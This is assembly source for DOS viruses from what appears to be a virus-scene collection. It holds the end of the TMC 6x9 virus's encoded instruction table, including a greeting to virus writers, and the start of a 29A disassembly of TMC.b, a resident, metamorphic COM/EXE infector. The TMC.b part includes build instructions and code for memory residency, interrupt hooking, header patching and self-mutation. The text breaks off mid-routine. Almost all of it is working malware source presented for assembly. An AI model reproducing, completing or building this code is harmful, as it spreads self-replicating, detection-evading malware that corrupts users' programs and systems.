; JMP imm16 (opcode 0e9h) dw 1399h ; Pointer to maximum_mem db 11101111b ; End of block maximum_mem db 11101110b ; Beginning of block dw 1399h ; Block identification of maximum_mem db 03h ; Three bytes instruction add ax,[si+0ch] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store size of memory block in pa... db 11101101b ; Data reference dw 1395h ; Pointer to mcb_size__ db 03h ; Three bytes instruction mov ax,[si+0eh] ; AX = initial SS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SS relative to sta... db 11101101b ; Data reference dw 138ah ; Pointer to initial_ss_ db 03h ; Three bytes instruction mov ax,[si+10h] ; AX = initial SP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial SP db 11101101b ; Data reference dw 138ch ; Pointer to initial_sp_ db 03h ; Three bytes instruction mov ax,[si+14h] ; AX = initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 138bh ; Pointer to initial IP db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial IP db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction mov ax,[si+16h] ; AX = initial CS relative to star... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store initial CS relative to sta... db 11101101b ; Data reference dw 1389h ; Pointer to initial_cs_ db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 05h ; Five bytes instruction mov [si+0ch],0ffffh ; Store maximum paragraphs to allo... db 05h ; Five bytes instruction mov [si+10h],7ffeh ; Store initial SP db 05h ; Five bytes instruction mov word ptr [si+14h],00h db 03h ; Three bytes instruction mov cx,10h ; Divide by paragraphs db 02h ; Two bytes instruction div cx ; DX:AX = filesize in paragraphs db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 01h ; One byte instruction inc ax ; Increase initial CS/SS relative ... db 03h ; Three bytes instruction mov [si+0eh],ax ; Store initial SS relative to sta... db 03h ; Three bytes instruction mov [si+16h],ax ; Store initial CS relative to sta... db 03h ; Three bytes instruction mov ax,[si+04h] ; AX = total number of 512-byte pa... db 01h ; One byte instruction inc ax ; Increase total number of 512-byt... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add maximum paragraphs to alloca... db 02h ; Two bytes instruction mov di,ax ; DI = minimum paragraphs to alloc... db 01h ; One byte instruction pop cx ; Load CX from stack (DX) db 01h ; One byte instruction pop dx ; Load DX from stack (AX) db 03h ; Three bytes instruction and dx,1111111111110000b db 03h ; Three bytes instruction add dx,10h ; DX = low-order word of offset fr... db 03h ; Three bytes instruction adc cx,00h ; CX = high-order word of offset f... db 03h ; Three bytes instruction mov ax,4200h ; Set current file position (SOF) db 02h ; Two bytes instruction int 21h db 03h ; Three bytes instruction add ax,1234h ; AX = length of virus db 11101101b ; Data reference dw 66h ; Pointer to virus_end db 03h ; Three bytes instruction adc dx,00h ; Convert to 32-bit db 03h ; Three bytes instruction mov cx,200h ; Divide by pages db 02h ; Two bytes instruction div cx ; DX:AX = filesize in pages db 03h ; Three bytes instruction mov [si+02h],dx ; Store number of bytes in last 51... db 03h ; Three bytes instruction add dx,0ffffh ; Add sixty-five thousand five hun... db 03h ; Three bytes instruction adc ax,00h ; Convert to 32-bit db 03h ; Three bytes instruction mov [si+04h],ax ; Store total number of 512-byte p... db 05h ; Five bytes instruction mov [si+0ah],800h ; Store minimum paragraphs of memo... db 01h ; One byte instruction inc ax ; Store total number of 512-byte p... db 02h ; Two bytes instruction mov cl,05h ; Divide by thirty-two db 02h ; Two bytes instruction shl ax,cl ; AX = total number of 512-byte pa... db 03h ; Three bytes instruction sub ax,[si+08h] ; Subtract header size in paragrap... db 03h ; Three bytes instruction add ax,[si+0ah] ; Add maximum paragraphs to alloca... db 03h ; Three bytes instruction mov ds:[1234h],ax ; Store new size in paragraphs db 11101101b ; Data reference dw 1393h ; Pointer to new_mcb_siz db 02h ; Two bytes instruction sub di,ax ; DI = additional minimum paragrap... db 01110110b+10000000b ; Below or equal? Jump to dont_add... dw 1396h ; Pointer to dont_add_mem db 03h ; Three bytes instruction add [si+0ah],di ; Add additional minimum paragraph... db 11101001b ; JMP imm16 (opcode 0e9h) dw 1396h ; Pointer to dont_add_mem db 11101111b ; End of block dont_add_mem db 11101110b ; Beginning of block dw 1396h ; Block identification of dont_add... db 03h ; Three bytes instruction mov ax,14h ; AX = probability of storing inco... db 04h ; Four bytes instruction cmp ds:[1234h],ax ; Store incorrect IP? db 11101101b ; Data reference dw 0bech ; Pointer to probability_ db 03h ; Three bytes instruction mov ax,00h ; ADD [BX+SI],AL (opcode 00h,00h) db 01110111b+10000000b ; Above? Jump to write_virus dw 138eh ; Pointer to write_virus db 03h ; Three bytes instruction mov bp,10h ; Random number within sixteen db 11101000b ; CALL imm16 (opcode 0e8h) dw 0bd5h ; Pointer to rnd_in_rang db 02h ; Two bytes instruction sub al,08h ; Subtract eight from random number db 03h ; Three bytes instruction mov di,1234h ; DI = offset of incorrec_ip db 11101101b ; Data reference dw 1773h ; Pointer to incorrec_ip db 03h ; Three bytes instruction add [di+01h],al ; Add random number to incorrect IP db 06h ; Six bytes instruction mov ds:[00h],1110110100110011b db 03h ; Three bytes instruction mov ax,1001000010010000b db 11101001b ; JMP imm16 (opcode 0e9h) dw 138eh ; Pointer to write_virus db 11101111b ; End of block int24_virus db 11101110b ; Beginning of block dw 1770h ; Block identification of int24_virus db 02h ; Two bytes instruction mov al,03h ; Fail system call in progress db 01h ; One byte instruction iret ; Interrupt return db 11101111b ; End of block int24_store db 11101110b ; Beginning of block dw 13a4h ; Block identification of int24_store db 01h ; One byte instruction push dx ; Save DX at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction push es ; Save ES at stack db 01h ; One byte instruction push cs ; Save CS at stack db 01h ; One byte instruction pop ds ; Load DS from stack (CS) db 03h ; Three bytes instruction mov ax,3524h ; Get interrupt vector 24h db 02h ; Two bytes instruction int 21h db 04h ; Four bytes instruction mov ds:[1234h],es ; Store segment of interrupt 24h db 11101101b ; Data reference dw 13a2h ; Pointer to int24_seg db 04h ; Four bytes instruction mov ds:[1234h],bx ; Store offset of interrupt 24h db 11101101b ; Data reference dw 13a3h ; Pointer to int24_off db 03h ; Three bytes instruction mov dx,1234h ; DX = offset of int24_virus db 11101101b ; Data reference dw 1770h ; Pointer to int24_virus db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop es ; Load ES from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block int24_load db 11101110b ; Beginning of block dw 13a5h ; Block identification of int24_load db 01h ; One byte instruction push ds ; Save DS at stack db 05h ; Five bytes instruction mov dx,cs:[1234h] ; DX = offset of interrupt 24h db 11101101b ; Data reference dw 13a3h ; Pointer to int24_off db 05h ; Five bytes instruction mov ds,cs:[1234h] ; DS = segment of interrupt 24h db 11101101b ; Data reference dw 13a2h ; Pointer to int24_seg db 03h ; Three bytes instruction mov ax,2524h ; Set interrupt vector 24h db 02h ; Two bytes instruction int 21h db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction ret ; Return db 11101111b ; End of block push_regs db 11101110b ; Beginning of block dw 13a0h ; Block identification of push_regs db 05h ; Five bytes instruction pop cs:[1234h] ; Load 16-bit immediate from stack db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 01h ; One byte instruction push ax ; Save AX at stack db 01h ; One byte instruction push bx ; Save BX at stack db 01h ; One byte instruction push cx ; Save CX at stack db 01h ; One byte instruction push dx ; Save DX at stack db 01h ; One byte instruction push si ; Save SI at stack db 01h ; One byte instruction push di ; Save DI at stack db 01h ; One byte instruction push bp ; Save BP at stack db 01h ; One byte instruction push ds ; Save DS at stack db 01h ; One byte instruction push es ; Save ES at stack db 05h ; Five bytes instruction jmp cs:[1234h] db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 11101111b ; End of block pop_regs db 11101110b ; Beginning of block dw 13a1h ; Block identification of pop_regs db 05h ; Five bytes instruction pop cs:[1234h] ; Load 16-bit immediate from stack db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 01h ; One byte instruction pop es ; Load ES from stack db 01h ; One byte instruction pop ds ; Load DS from stack db 01h ; One byte instruction pop bp ; Load BP from stack db 01h ; One byte instruction pop di ; Load DI from stack db 01h ; One byte instruction pop si ; Load SI from stack db 01h ; One byte instruction pop dx ; Load DX from stack db 01h ; One byte instruction pop cx ; Load CX from stack db 01h ; One byte instruction pop bx ; Load BX from stack db 01h ; One byte instruction pop ax ; Load AX from stack db 05h ; Five bytes instruction jmp cs:[1234h] db 11101101b ; Data reference dw 13aah ; Pointer to imm16 db 11101111b ; End of block int21_addr db 11101110b ; Beginning of block dw 0c9h ; Block identification of int21_addr db 04h+10h ; Four bytes data dd 00h ; Address of interrupt 21h db 11101111b ; End of block int21_seg db 11101110b ; Beginning of block dw 13a2h ; Block identification of int24_seg db 02h+10h ; Two bytes data dw 00h ; Segment of interrupt 24h db 11101111b ; End of block int21_off db 11101110b ; Beginning of block dw 13a3h ; Block identification of int24_off db 02h+10h ; Two bytes data dw 00h ; Offset of interrupt 24h db 11101111b ; End of block imm16 db 11101110b ; Beginning of block dw 13aah ; Block identification of imm16 db 02h+10h ; Two bytes data dw 00h ; 16-bit immediate db 11101111b ; End of block exe_header db 11101110b ; Beginning of block dw 138fh ; Block identification of exe_header db 18h+10h ; Twenty-four bytes data db 18h dup(00h) ; EXE header db 11101111b ; End of block timer_ticks db 11101110b ; Beginning of block dw 13adh ; Block identification of timer_ticks db 02h+10h ; Two bytes data dw 00h ; Timer ticks since midnight db 11101111b ; End of block file_time db 11101110b ; Beginning of block dw 12ch ; Block identification of file_time db 02h+10h ; Two bytes data dw 00h ; File time db 11101111b ; End of block file_date db 11101110b ; Beginning of block dw 12dh ; Block identification of file_date db 02h+10h ; Two bytes data dw 00h ; File date db 11101111b ; End of block progra_seg db 11101110b ; Beginning of block dw 139fh ; Block identification of progra_seg db 02h+10h ; Two bytes data dw 00h ; Segment of PSP for current process db 11101111b ; End of block file_handle db 11101110b ; Beginning of block dw 139dh ; Block identification of file_handle db 02h+10h ; Two bytes data dw 00h ; File handle db 11101111b ; End of block filename db 11101110b ; Beginning of block dw 139eh ; Block identification of filename db (filena_end-filena_begin)+10h filena_begin: db 07h dup(00h,01h,02h,03h,04h,05h,06h,07h,08h,09h,0ah) filena_end: db 11101111b ; End of block message db 11101110b ; Beginning of block dw 2328h ; Block identification of message db (message_end-messag_begin)+10h messag_begin db 0dh,0ah db 0dh,0ah db 'þ TMC 1.0 by Ender þ',0dh,0ah db 'Welcome to the Tiny Mutation Compiler!',0dh,0ah db 'Dis is level 6*9.',0dh,0ah db 'Greetings to virus makers: Dark Avenger, Vyvojar, SVL, Hell Angel',0dh,0ah db 'Personal greetings: K. K., Dark Punisher',0dh,0ah db 0dh,0ah message_end: db 11101111b ; End of block db 00h ; End of table table_end: code_end: end code_begin ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_6x9.asm]ÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[tmc_b.asm]ÄÄÄ comment * TMC.b ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ Super/29A and Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ TMC.b is a 4780 bytes resident appending COM and EXE virus. Infects at load and/or execute program, rename file and open file. TMC.b has an error handler, retro structures and is metamorphic in file and memory using Tiny Mutation Compiler v 1.00 [TMC]. To compile TMC.b with Turbo Assembler v 5.0 type: TASM /M TMC_B.ASM TLINK /x TMC_B.OBJ EXE2BIN TMC_B.EXE TMC_B.COM * .model tiny .code code_begin: mov bp,100h ; BP = delta offset cld ; Clear direction flag mov ax,ds ; AX = segment of PSP for current ... mov [bp+program_seg],ax ; Store segment of PSP for current... dec ax ; AX = segment of current Memory C... mov ds,ax ; DS = segment of current Memory C... mov ax,ds:[03h] ; AX = size of memory block in par... cmp ax,1900h ; Insufficient memory? jae resize_mem ; Above or equal? Jump to resize_mem jmp terminate resize_mem: push cs ; Save CS at stack pop ds ; Load DS from stack (CS) mov [bp+mcb_size_],ax ; Store size of memory block in p... mov bx,[bp+new_mcb_size] mov ah,4ah ; Resize memory block int 21h jnc allocate_mem ; No error? Jump to allocate_mem jmp terminate allocate_mem: mov ah,48h ; Allocate memory mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] dec bx ; BX = number of paragraphs to all... cmp bx,0c00h ; Insufficient memory? jae allocat_mem ; Above or equal? Jump to allocat_... jmp terminate allocat_mem: int 21h jnc initiali_tmc ; No error? Jump to initiali_tmc jmp terminate initiali_tmc: mov es,ax ; ES = segment of allocated memory mov es:[01h],0deadh ; Store 16-bit random number mov word ptr es:[0ch],00h mov es:[04h],1000h ; Store offset of block information mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i... mov es:[08h],3000h ; Store offset of data information lea si,[bp+tmc_table] ; SI = offset of tmc_table push si ; Save SI at stack mov bx,4000h ; BX = offset of next virus genera... jmp initial_tmc initial_tmc: mov di,10h ; DI = offset of table of blocks xor ax,ax ; Zero AX jmp tmc_ini_loop tmc_ini_loop: add si,ax ; SI = offset of block or instruct... call decrypt_byte or al,al ; End of table? jz calc_blocks ; Zero? Jump to calc_blocks nop nop nop cmp al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_block ; Above or equal? Jump to exam_block nop nop nop cmp al,10h ; Data? jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_... nop nop nop sub al,10h ; AL = length of data jmp tmc_ini_loop exam_block: cmp al,11101111b ; End of block? jne exam_block_ ; Not equal? Jump to exam_block_ nop nop nop mov al,00h ; Don't add anything to offset wit... jmp tmc_ini_loop exam_block_: cmp al,11101110b ; Beginning of block? jne next_byte ; Not equal? Jump to next_byte nop nop nop mov ax,si ; AX = offset of block identification dec ax ; AX = offset of block within table stosw ; Store offset of block within table mov ax,0ffffh ; Block is still in one part stosw ; Store block identification mov ax,02h ; Add two to offset within table jmp tmc_ini_loop next_byte: mov al,02h ; Add two to offset within table jmp tmc_ini_loop calc_blocks: lea ax,[di-10h] ; AX = number of blocks multiplied... shr ax,01h ; Divide number of blocks by two shr ax,01h ; Divide number of blocks by two mov es:[0ah],ax ; Store number of blocks xor ax,ax ; End of table stosw ; Store end of table mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_bloc split_block: push bp ; Save BP at stack mov bp,es:[0ah] ; BP = number of blocks call rnd_in_range pop bp ; Load BP from stack shl ax,01h ; Multiply random number with two shl ax,01h ; Multiply random number with two add ax,10h ; Add ten to random number mov di,ax ; DI = random offset within table jmp exam_nxt_blo exam_nxt_blo: add di,04h ; DI = offset of next offset withi... mov si,es:[di] ; SI = offset of next block within... or si,si ; End of table? jnz exam_block__ ; Not zero? Jump to exam_block__ nop nop nop mov di,10h ; DI = offset of table of blocks mov si,es:[di] ; SI = offset of block within table jmp exam_block__ exam_block__: push ax ; Save AX at stack call decrypt_byte dec si ; Decrease offset of block within ... cmp al,11101111b ; End of block? pop ax ; Load AX from stack jne exam_bloc ; Not equal? Jump to exam_bloc nop nop nop cmp di,ax ; End of table of blocks? jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo nop nop nop jmp exam_tbl_inf exam_bloc: mov ax,es:[di+02h] ; AX = block information cmp ax,0ffffh ; Block is still in one part? je exam_bloc_ ; Equal? Jump to exam_bloc_ nop nop nop push di ; Save DI at stack mov di,ax ; DI = offset of end of first part... mov al,11101001b ; JMP imm16 (opcode 0e9h) stosb ; Store JMP imm16 mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... sub ax,di ; Subtract offset of end of first ... stosw ; Store 16-bit immediate pop di ; Load DI from stack jmp exam_bloc_ exam_bloc_: call decrypt_byte cmp al,11101111b ; End of block? jne exam_bloc__ ; Not equal? Jump to exam_bloc__ jmp end_of_block exam_bloc__: cmp al,10h ; Data; CALL; JMP; Data reference...? ja exam_bloc___ ; Above? Jump to exam_bloc___ nop nop nop push ax bp ; Save registers at stack mov bp,[bp+probability] ; BP = probability call rnd_in_range or ax,ax ; Split up block? pop bp ax ; Load registers from stack jz split_block ; Zero? Jump to split_block_ nop nop nop jmp exam_bloc___ exam_bloc___: cmp al,11101111b ; End of block? jne exam_blo ; Not equal? Jump to exam_blo jmp end_of_block exam_blo: cmp al,11101000b ; CALL; JMP; Data reference; Jcc? jae exam_data ; Above or equal? Jump to exam_data nop nop nop cmp al,10h ; Data? jbe sto_instruct ; Below or equal? Jump to sto_inst... nop nop nop sub al,10h ; AL = length of data jmp sto_instruct sto_instruct: xor cx,cx ; Zero CX mov cl,al ; CL = length of instruction push di ; Save DI at stack mov di,bx ; DI = offset within next virus ge... jmp sto_ins_loop sto_ins_loop: call decrypt_byte stosb ; Store byte of instruction dec cx ; Decrease counter jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop nop nop nop mov bx,di ; BX = offset within next virus ge... pop di ; Load DI from stack jmp exam_bloc_ exam_data: cmp al,11101101b ; Data reference? jne exam_blo_ ; Not equal? Jump to exam_blo_ nop nop nop push di ; Save DI at stack mov di,es:[08h] ; DI = offset within data information mov ax,bx ; AX = offset within next virus ge... dec ax ; Decrease offset within next viru... dec ax ; Decrease offset within next viru... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[08h],di ; Store offset within data informa... pop di ; Load DI from stack jmp exam_bloc_ exam_blo_: cmp al,11101110b ; Beginning of block? jne sto_call_jmp ; Not equal? Jump to sto_call_jmp nop nop nop push di ; Save DI at stack mov di,es:[04h] ; DI = offset within block informa... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus ge... call decrypt_id stosw ; Store block identification mov es:[04h],di ; Store offset within block inform... cmp ax,4c5h ; Block identification of tmc_table? jne exam_message ; Not equal? Jump to exam_message nop nop nop push si ; Save SI at stack mov di,bx ; DI = offset within next virus ge... lea si,[bp+tmc_table] ; SI = offset of tmc_table mov cx,(table_end-table_begin) rep movsb ; Move table to top of memory mov bx,di ; BX = offset within next virus ge... pop si ; Load SI from stack jmp examine_next exam_message: cmp ax,2328h ; Block identification of message? jne exam_probabi ; Not equal? Jump to exam_probabi nop nop nop mov ax,14h ; Probability of including message cmp [bp+probability],ax ; Include message? jae examine_next ; Above or equal? Jump to examine_... nop nop nop call decrypt_byte sub al,10h ; AL = length of message mov ah,00h ; Zero AH add si,ax ; SI = offset of end of message jmp examine_next exam_probabi: cmp ax,0bech ; Block identification of probabi...? jne examine_next ; Not equal? Jump to examine_next nop nop nop mov ax,[bp+probability] ; AX = probability dec ax ; Decrease probability cmp ax,05h ; Probability too small? jae store_probab ; Above or equal? Jump to store_pr... nop nop nop mov ax,64h ; Reset probability jmp store_probab store_probab: mov es:[bx],ax ; Store probability add bx,02h ; Add two to offset within next vi... add si,03h ; SI = offset of beginning of next... jmp examine_next examine_next: pop di ; Load DI from stack call decrypt_byte jmp exam_bloc___ sto_call_jmp: push ax di ; Save registers at stack mov di,es:[06h] ; DI = offset within CALL; JMP; Jc... mov ax,bx ; AX = offset within next virus ge... stosw ; Store offset within next virus g... call decrypt_id stosw ; Store block identification mov es:[06h],di ; Store offset within CALL; JMP; J... pop di ax ; Load registers from stack mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc... add bx,03h ; Add three to offset within next ... cmp al,11110000b ; Jump condition? jae jcc_imm8 ; Above or equal? Jump to jcc_imm8 jmp exam_bloc_ jcc_imm8: inc bx ; Increase offset within next viru... inc bx ; Increase offset within next viru... jmp exam_bloc_ split_block_: mov es:[di+02h],bx ; Store offset within next virus g... add bx,03h ; Add three to offset within next ... jmp end_of_block end_of_block: dec si ; Decrease offset of block within ... mov es:[di],si ; Store offset of block within table jmp split_block exam_tbl_inf: cmp word ptr es:[0ch],00h jne correct_i16 ; End of second table? Jump to cor... nop nop nop pop si ; Load SI from stack mov es:[0ch],bx ; Store offset within next virus g... add si,(second_table-first_table) jmp initial_tmc correct_i16: push es ; Save ES at stack pop ds ; Load DS from stack (ES) sub bx,4000h ; Subtract offset of next virus ge... mov ds:[0eh],bx ; Store length of virus mov si,2000h ; SI = offset of CALL; JMP; Jcc im... mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;... sub cx,si ; Subtract offset of CALL; JMP; Jc... shr cx,01h ; Divide number of CALL imm16; JMP... shr cx,01h ; Divide number of CALL imm16; JMP... jmp jmp_call_loo jmp_call_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,1000h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block find_block: cmp ax,[si+02h] ; Found block? je found_block ; Equal? Jump to found_block nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block ; Not zero? Jump to find_block nop nop nop found_block: mov dx,[si] ; DX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) mov al,[bx] ; AL = first byte of instruction cmp al,11110000b ; Jump condition? jb sto_call_jm ; Below? Jump to sto_call_jm nop nop nop sub byte ptr [bx],10000000b inc bx ; BX = offset of 8-bit immediate push dx ; Save DX at stack sub dx,bx ; Subtract offset within next viru... dec dx ; Decrease 8-bit immediate cmp dx,7fh ; 8-bit immediate out of range? jg invert_jcc ; Greater? Jump to invert_jcc nop nop nop cmp dx,0ff80h ; 8-bit immediate out of range? jl invert_jcc ; Less? Jump to invert_jcc nop nop nop mov [bx],dl ; Store 8-bit immediate inc bx ; BX = offset of end of Jcc imm8 mov [bx],1001000010010000b mov byte ptr [bx+02h],10010000b pop dx ; Load DX from stack jmp correct_i16_ invert_jcc: pop dx ; Load DX from stack dec bx ; BX = offset of Jcc imm8 xor byte ptr [bx],00000001b inc bx ; BX = offset of 8-bit immediate mov byte ptr [bx],03h ; Store 8-bit immediate inc bx ; BX = offset of JMP imm16 mov al,11101001b ; JMP imm16 (opcode 0e9h) jmp sto_call_jm sto_call_jm: mov [bx],al ; Store CALL imm16; JMP imm16 inc bx ; BX = offset of 16-bit immediate sub dx,bx ; Subtract offset within next viru... dec dx ; Decrease 16-bit immediate dec dx ; Decrease 16-bit immediate mov [bx],dx ; Store 16-bit immediate jmp correct_i16_ correct_i16_: dec cx ; Decrease counter jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo nop nop nop mov si,3000h ; SI = offset of data information mov cx,ds:[08h] ; CX = offset of end of data infor... sub cx,si ; Subtract offset of data informat... shr cx,01h ; Divide number of data references... shr cx,01h ; Divide number of data references... jmp data_ref_loo data_ref_loo: lodsw ; AX = offset of block within data... push ax ; Save AX at stack lodsw ; AX = offset of block within data... push cx si ; Save registers at stack mov si,1000h ; SI = offset of block information mov cx,ds:[04h] ; CX = offset of end of block info... sub cx,si ; Subtract offset of block informa... shr cx,01h ; Divide number of block by two shr cx,01h ; Divide number of block by two jmp find_block_ find_block_: cmp ax,[si+02h] ; Found block? je found_block_ ; Equal? Jump to found_block_ nop nop nop add si,04h ; SI = offset of next block in table dec cx ; Decrease counter jnz find_block_ ; Not zero? Jump to find_block_ nop nop nop found_block_: mov ax,[si] ; AX = offset of block pop si cx ; Load registers from stack pop bx ; Load BX from stack (AX) sub ax,4000h ; Subtract offset of next virus ge... mov [bx],ax ; Store 16-bit immediate dec cx ; Decrease counter jnz data_ref_loo ; Not zero? Jump to data_ref_loo nop nop nop jmp restore_code restore_code: mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_ip] ; Save initial IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+origin_code] ; SI = offset of origin_code mov ax,cs:[si] ; AX = first two bytes of original... mov cs:[100h],ax ; Store first two bytes of origina... mov al,cs:[si+02h] ; AL = last byte of original code ... mov cs:[100h+02h],al ; Store last byte of original code... jmp move_virus mov ax,[bp+program_seg] ; AX = segment of PSP for current ... mov cx,[bp+initial_ss] ; CX = initial SS relative to star... add cx,10h ; Add ten to initial SS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+initial_sp] ; Save initial SP at stack mov cx,[bp+initial_cs] ; CX = initial CS relative to star... add cx,10h ; Add ten to initial CS relative t... add cx,ax ; Add segment of PSP for current p... push cx ; Save CX at stack push [bp+incorrect_ip] ; Save incorrect IP at stack push ax ; Save segment of PSP for current ... push [bp+mcb_size] ; Save size of memory block in par... push ds ; Save DS at stack mov cl,00h ; COM executable cmp [bp+executa_stat],cl jne move_virus ; COM executable? Jump to move_virus nop nop nop lea si,[bp+origin_code] ; SI = offset of origin_code mov ax,cs:[si] ; AX = first two bytes of original... mov cs:[100h],ax ; Store first two bytes of origina... mov al,cs:[si+02h] ; AL = last byte of original code ... mov cs:[100h+02h],al ; Store last byte of original code... jmp move_virus move_virus: xor ax,ax ; Zero AX mov ds,ax ; DS = segment of DOS communicatio... cmp byte ptr ds:[501h],10h jne move_virus_ ; Already resident? Jump to move_v... jmp virus_exit move_virus_: mov byte ptr ds:[501h],10h push es ; Save ES at stack pop ds ; Load DS from stack (ES) mov ax,ds:[0ch] ; AX = offset within next virus ge... sub ax,4000h ; Subtract offset of next virus ge... mov [bp+vir_exit_off],ax mov cx,ds:[0eh] ; CX = length of virus mov [bp+virus_length],cx mov si,4000h ; SI = offset of next virus genera... xor di,di ; Zero DI rep movsb ; Move virus to top of memory mov cl,04h ; Divide by paragraphs shr di,cl ; DI = length of next virus genera... inc di ; Increase length of next virus ge... mov bx,[bp+mcb_size_] ; BX = size of memory block in par... sub bx,[bp+new_mcb_size] sub bx,di ; Subtract length of next virus ge... dec bx ; Decrease new size in paragraphs dec bx ; Decrease new size in paragraphs cmp bx,di ; Insufficient memory? jae resize_mem_ ; Above or equal? Jump to resize_mem_ jmp virus_exit resize_mem_: mov ah,4ah ; Resize memory block int 21h jnc allocat_mem_ ; No error? Jump to allocat_mem_ jmp virus_exit allocat_mem_: mov bx,di ; BX = number of paragraphs to all... mov ah,48h ; Allocate memory int 21h jc virus_exit ; Error? Jump to virus_exit nop nop nop push ax ; Save AX at stack dec ax ; AX = segment of current Memory C... mov es,ax ; ES = segment of current Memory C... mov word ptr es:[01h],08h pop es ; Load ES from stack (AX) mov cx,[bp+virus_length] xor si,si ; Zero SI xor di,di ; Zero DI rep movsb ; Move virus to top of memory push es ; Save ES at stack push word ptr [bp+vir_exit_off] mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... mov ah,byte ptr [bp+sliding_key] retf ; Return far terminate: mov ax,4c00h ; Terminate with return code int 21h get_rnd_num proc near ; Get 16-bit random number push cx ; Save CX at stack in al,40h ; AL = 8-bit random number mov ah,al ; AH = 8-bit random number in al,40h ; AL = 8-bit random number xor ax,es:[01h] ; AX = 16-bit random number mov cl,ah ; CL = high-order byte of 16-bit r... rol ax,cl ; AX = 16-bit random number mov es:[01h],ax ; Store 16-bit random number pop cx ; Load CX from stack ret ; Return endp rnd_in_range proc near ; Random number within range or bp,bp ; Zero BP? jz zero_range ; Zero? Jump to zero_range nop nop nop push dx ; Save DX at stack call get_rnd_num xor dx,dx ; Zero DX div bp ; DX = random number within range xchg ax,dx ; AX = random number within range pop dx ; Load DX from stack ret ; Return zero_range: xor ax,ax ; AX = random number within range ret ; Return endp decrypt_byte proc near ; Decrypt byte of table mov [bp+ah_],ah ; Store AH mov ax,si ; AX = offset within table sub ax,bp ; Subtract delta offset from offse... sub ax,offset tmc_table ; Subtract offset of tmc_table fro... mul word ptr [bp+sliding_key] add al,[bp+crypt_key] ; AL = 8-bit encryption/decryption... xor al,[si] ; AL = byte of decrypted table mov ah,[bp+ah_] ; AH = stored AH inc si ; Increase offset within table ret ; Return endp decrypt_id proc near ; Decrypt block identification in ... call decrypt_byte mov ah,al 